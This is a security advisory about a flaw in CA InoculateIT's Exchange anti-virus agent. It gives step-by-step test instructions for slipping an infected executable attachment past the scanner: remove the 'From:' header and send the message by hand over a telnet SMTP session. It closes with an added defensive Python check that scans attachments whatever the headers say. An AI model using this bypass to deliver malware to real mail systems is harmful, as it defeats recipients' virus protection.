
CA InoculateIT MS Exchange agent vulnerability


Published: 2000-11-14
Updated: 2000-11-14
Severity:
Threat type: stealth attack
Error type: design error
Exploit mode: server mode

Affected systems
Computer Associates InoculateIT 4.53
   + Microsoft Exchange Server 5.5
      - Microsoft Windows NT 4.0
      - Microsoft BackOffice 4.5
         - Microsoft Windows NT 4.0
Detailed description
InoculateIT 4.52 is a popular anti-virus product for Exchange Server.
It contains a vulnerability that allows a local attacker to get a virus past the agent and the MS Exchange server.
There are several ways to bypass the check; one of them is to remove the "From:" field from the infected message
and send the message to the Exchange Server: InoculateIT 4.52 will then not detect the infected file.

Test code
1. Obtain a message containing any infected MIME-encoded attachment. I simply sent one to the Exchange server from outside
and had Exchange dump it out to c:\TurfDir;
2. Use notepad.exe to edit the file and remove the "From:..." header, for example:
Remove this line: From: Test <Test@abc.com.br>
To: Joe Bob <jbob@xyz.com.br>
Subject: Test
Date: Mon, 23 Oct 2000 10:59:53 -0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: application/x-msdownload;
name=3D"Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=3D"Fix2001.exe"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
AgAAAAAAABAAAAAQAAAAMAAA...

3. Copy the contents of notepad to the clipboard.
4. Issue the command "telnet your_exsrvr 25"

220 aaa.xyz.com.br ESMTP Server (Microsoft Exchange Internet Mail
Service 5.5.2650.21) ready
helo
250 OK
mail from:<>
250 OK - mail from <>
rcpt to:<jbob@xyz.com.br>
250 OK - Recipient <jbob@xyz.com.br>
data
354 Send data. End with CRLF.CRLF

The following is the content pasted from the clipboard:

To: Joe Bob <jbob@xyz.com.br>
Subject: Test
Date: Mon, 23 Oct 2000 10:59:53 -0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: application/x-msdownload;
name=3D"Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=3D"Fix2001.exe"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
AgAAAAAAABAAAAAQAAAAMAAA...

250 OK
quit
221 closing connection

5. The message is delivered, and the CA agent does not detect the infected file.
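
The advisory's lesson for anyone filtering mail in front of Exchange is that the decision to scan must come from the attachment content, not from the presence of optional headers such as "From:". The following Python check is an added example written for this page; it is not code from the advisory, from xfocus, or from Computer Associates. It assumes (as an illustration, not a confirmed root cause) that the agent treated a message without "From:" as something other than mail and skipped it, reproduces that flawed gate as verdict_naive, and shows a hardened verdict that inspects every part. The sample message and its base64 payload are constructed here: a few bytes carrying the MZ magic and the DOS-stub string, not an executable.

```python
"""Gateway-side attachment check that does not depend on the From: header."""
import base64
from email import policy
from email.parser import BytesParser

# Declared types and extensions commonly used for Windows executables,
# plus the "MZ" magic at the start of every DOS/PE binary.
EXECUTABLE_TYPES = {"application/x-msdownload", "application/x-dosexec"}
EXECUTABLE_EXTS = (".exe", ".com", ".scr", ".pif", ".bat", ".dll")
MZ_MAGIC = b"MZ"


def executable_attachments(raw: bytes) -> list:
    """Return (filename, reasons) for each MIME part that looks like a Windows executable.

    Every leaf part is judged on its declared content type, its filename
    extension and the decoded payload's magic bytes; headers such as From:
    play no role in the decision.
    """
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    hits = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename() or ""
        reasons = []
        ctype = part.get_content_type()
        if ctype in EXECUTABLE_TYPES:
            reasons.append(f"content-type {ctype}")
        if name.lower().endswith(EXECUTABLE_EXTS):
            reasons.append(f"filename {name}")
        payload = part.get_payload(decode=True) or b""
        if payload.startswith(MZ_MAGIC):
            reasons.append("MZ magic in payload")
        if reasons:
            hits.append((name, "; ".join(reasons)))
    return hits


def missing_headers(raw: bytes, required=("From", "Date", "Message-ID")) -> list:
    """List headers a normal mail client always sets; their absence marks a hand-crafted message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    return [h for h in required if msg[h] is None]


def verdict_naive(raw: bytes) -> str:
    """Assumed flawed gate: a message without From: is not treated as mail and is never scanned."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    if msg["From"] is None:
        return "passed (not scanned)"
    return "blocked" if executable_attachments(raw) else "passed"


def verdict_hardened(raw: bytes) -> str:
    """Scan every message regardless of its headers; content alone decides."""
    return "blocked" if executable_attachments(raw) else "passed"


# Constructed sample payload (not the advisory's attachment): the MZ magic
# followed by the DOS-stub text, base64-encoded like the advisory's message.
_STUB = b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode.\r\n"
_B64 = base64.b64encode(_STUB).decode()

# Constructed message mirroring the advisory's header layout, From: removed.
SAMPLE_NO_FROM = (
    "To: Joe Bob <jbob@example.com>\r\n"
    "Subject: Test\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: application/x-msdownload; name=\"Fix2001.exe\"\r\n"
    "Content-Transfer-Encoding: base64\r\n"
    "Content-Disposition: attachment; filename=\"Fix2001.exe\"\r\n"
    "\r\n" + _B64 + "\r\n"
).encode()

# Same message with the From: line present.
SAMPLE_WITH_FROM = b"From: Test <test@example.com>\r\n" + SAMPLE_NO_FROM


if __name__ == "__main__":
    for label, raw in (("with From:", SAMPLE_WITH_FROM), ("without From:", SAMPLE_NO_FROM)):
        print(f"{label:14} naive={verdict_naive(raw):20} hardened={verdict_hardened(raw):8} "
              f"missing={missing_headers(raw)}")
```

Run stand-alone, the script shows the naive gate letting the headerless message through while the hardened one blocks both variants. On a real gateway the missing_headers result is a useful secondary signal for logging or quarantine, but the block decision should rest on the attachment inspection alone.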

Solution
None available yet

Related information